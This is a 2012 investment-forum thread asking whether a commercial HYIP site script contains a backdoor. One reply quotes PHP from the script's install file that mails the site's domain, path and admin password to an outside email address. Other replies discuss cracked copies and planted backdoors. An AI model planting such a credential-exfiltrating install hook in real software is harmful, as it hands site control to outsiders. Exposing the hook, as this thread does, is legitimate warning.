our advertising disclaimer | Disclaimer - Must be read before using forum or clicking any links
youtradefx.com
hyipregulate.com
Click To See IF You Qualify For FREE DDoS Protected Hosting!
Thats right! You could earn free DDoS Protected hosting for a full year. Click now to see if you qualify!
BlockDOS.net - DDOS Protected Web Hosting!
The same protection that Talkgold Uses! Starting at $400/month when you mention Talkgold! The most reliable DDOS protection online!
Put your banner or text in the rotation above!ONLY $17/day, $99/week, or $379/month!


All banners and links On Talkgold are advertisements only. We do not endorse or vouch for any advertiser's claims. Use Extreme Caution & perform your own due diligence before sending money to anyone!Put Your 728X90 Banner Here NOW!
Go Back   Talkgold HYIP, Investment & Money Forum > Caution : Risky High Yield Investing Programs > HYIP - AutoSurf Program Admin Talk

Reply
 
Thread Tools Display Modes

Is probizscript.com a backdoor script?
  #1  
Old 05-20-2012, 01:18 PM
calco calco is offline
Premium Club Member
 
Join Date: Jul 2004
Location: globalcashsite.com
Posts: 6,822
Default Is probizscript.com a backdoor script?

Hi guys

I want to know if this script has backdoors like goldcoder or this is safe script? Any experience?

Calco
__________________
hyip monitoring Unique & best hyip monitoring service, free banner for professional sites
cheap hyip services buy hyip traffic, facebook likes and twitter followers. Hyip scripts & designs available

4% x 160 Days Compounding available, 100% custom script. LR, PM, STP, OkPay, Payza & EgoPay
Reply With Quote

Re: Is probizscript.com a backdoor script?
  #2  
Old 05-20-2012, 01:48 PM
the_crippler's Avatar
the_crippler the_crippler is offline
"Talkgold's Best" Club
 
Join Date: Dec 2005
Location: Talkgold
Posts: 4,294,967,295
Send a message via Skype™ to the_crippler
Default Re: Is probizscript.com a backdoor script?

read around here

http://www.talkgold.com/forum/showth...=332693&page=1

i doubt probiz to have backdoor
Reply With Quote

Re: Is probizscript.com a backdoor script?
  #3  
Old 05-20-2012, 02:50 PM
moneyfreak moneyfreak is offline
VIP Investor
 
Join Date: Jan 2010
Posts: 1,423
Default Re: Is probizscript.com a backdoor script?

I have to say that basically probizscript is a very good script. But unfortunately it has a few bugs. Add plans does not work properly, so you have to generate the table with investment plans by yourself. Another bug is that you can not add users manually. There is a feature for it, but it does not work. For this price such things should not happen!

What I also do not like about it is that you have no chance decrypting the code and make any changes to it (and there really is a need to change some things for better use). I think best way is still developing your own script.
Reply With Quote

Re: Is probizscript.com a backdoor script?
  #4  
Old 05-21-2012, 01:31 AM
cricketbux cricketbux is offline
Amateur Investor
 
Join Date: May 2011
Posts: 50
Default Re: Is probizscript.com a backdoor script?

few days ago ProBiz team send e-mails with information of new patch for their script.
Reply With Quote

Re: Is probizscript.com a backdoor script?
  #5  
Old 06-04-2012, 12:50 PM
Capitaliva Capitaliva is offline
Banned
 
Join Date: Feb 2012
Location: Delaware
Posts: 268
Default Re: Is probizscript.com a backdoor script?

Quote:
Originally Posted by the_crippler View Post
read around here

http://www.talkgold.com/forum/showth...=332693&page=1

i doubt probiz to have backdoor
Yes it has. I recommend you reading my situation: http://www.talkgold.com/forum/r360055-.html
Reply With Quote

Re: Is probizscript.com a backdoor script?
  #6  
Old 06-04-2012, 05:59 PM
Capitaliva Capitaliva is offline
Banned
 
Join Date: Feb 2012
Location: Delaware
Posts: 268
Default Re: Is probizscript.com a backdoor script?

Another Update: http://i.imgur.com/j27dz.png

He's willing to cooperate now that his business is on the line LOL. After he scammed me, he's trying to be act nice. Not expecting anything back but I don't care. I'm going to keep fighting that scammer.

Check out capitaliva.com for more updates regarding this issue.
Reply With Quote

Re: Is probizscript.com a backdoor script?
  #7  
Old 07-31-2012, 10:17 PM
hyiphomes hyiphomes is offline
Newbie Amateur
 
Join Date: Jul 2012
Location: hyiphomes.com
Posts: 1
Send a message via Yahoo to hyiphomes
Default Re: Is probizscript.com a backdoor script?

Probiz still have backdoor you can find in install folder, file name do.php

[QUOTE
]$toFile .= "?>";
@fwrite( $fp, $toFile );
@fclose( $fp );
$subject = "New Script Installation [ ".$_SERVER['HTTP_HOST']." ]";
$message = "Domain Url : ".$_SERVER['HTTP_HOST'];
$message .= "\nFull Path : ".$_SERVER['PHP_SELF'];
$message .= "\nDate : ".date( "jS M,Y h:i:s", time( ) );
$message .= "\nCurrent Admin Password : ".$adpass;
mail( "sumercrew@gmx.com", $subject, $message );
[/QUOTE]
At first installation admin password and link will be send to that email address (sumercrew). I know about this from my friend.
Reply With Quote

Re: Is probizscript.com a backdoor script?
  #8  
Old 08-01-2012, 04:00 PM
Joseph's Avatar
Joseph Joseph is offline
Super MODerator
 
Join Date: Mar 2006
Location: location > /dev/null 2>&1
Posts: 7,024
Default Re: Is probizscript.com a backdoor script?

I believe this stupid trick was added in cracked script.
Reply With Quote

Re: Is probizscript.com a backdoor script?
  #9  
Old 08-04-2012, 05:31 AM
prohostfirm prohostfirm is offline
Banned
 
Join Date: Dec 2003
Posts: 655
Default Re: Is probizscript.com a backdoor script?

Script backdoor implanted by its author is common way to check its user whether using licensed script or other use for intrusion if user use cracked one because like Goldcoders script all of their hyip script and hyip lister script contains link or email to Goldcoders and some hidden backdoor.

Bytheway this probizscript is not made by us though almost same name, LOL. Have seen their script encrypted with latest SourceGuardian. Wait a a year or two and it will becomes open source like the rest, LOL. Then phphyip and buy4php and goldencoders will display it on their website, LOL again. But be careful some of them so lazy to clean its script author backdoor link.

Last edited by prohostfirm; 08-04-2012 at 05:54 AM..
Reply With Quote
Reply


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


TALKGOLD
SIDEBAR ADS

ADVERTISE HERE. Must read: Advertising Terms & Disclaimer
PUT YOUR 120X120 AD HERE FOR ONLY $410/WEEK!
Click Here for details.
Your Ad Here Cost of Ad - $400
Your Ad Here Cost of Ad - $400
Your Ad Here Cost of Ad - $390
Your Ad Here Cost of Ad - $390
Your Ad Here Cost of Ad - $390
Your Ad Here Cost of Ad - $350
Your Ad Here Cost of Ad - $350
Your Ad Here Cost of Ad - $310
Your Ad Here Cost of Ad - $310
Your Ad Here Cost of Ad - $300
Your Ad Here Cost of Ad - $145
Your Ad Here Cost of Ad - $135/week
Your Ad Here Cost of Ad - $135/week
Your Ad Here Cost of Ad - $125
Your Ad Here Cost of Ad - $125
YOUR AD HERE

PUT YOUR NON-ROTATING AD HERE NOW!
ONLY $125/Week


Your Ad Here for $85/week or $325/month

All times are GMT. The time now is 10:38 AM.


Protected by BlockDOS.net - DDOS Protection
Forum by: vBulletin - Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.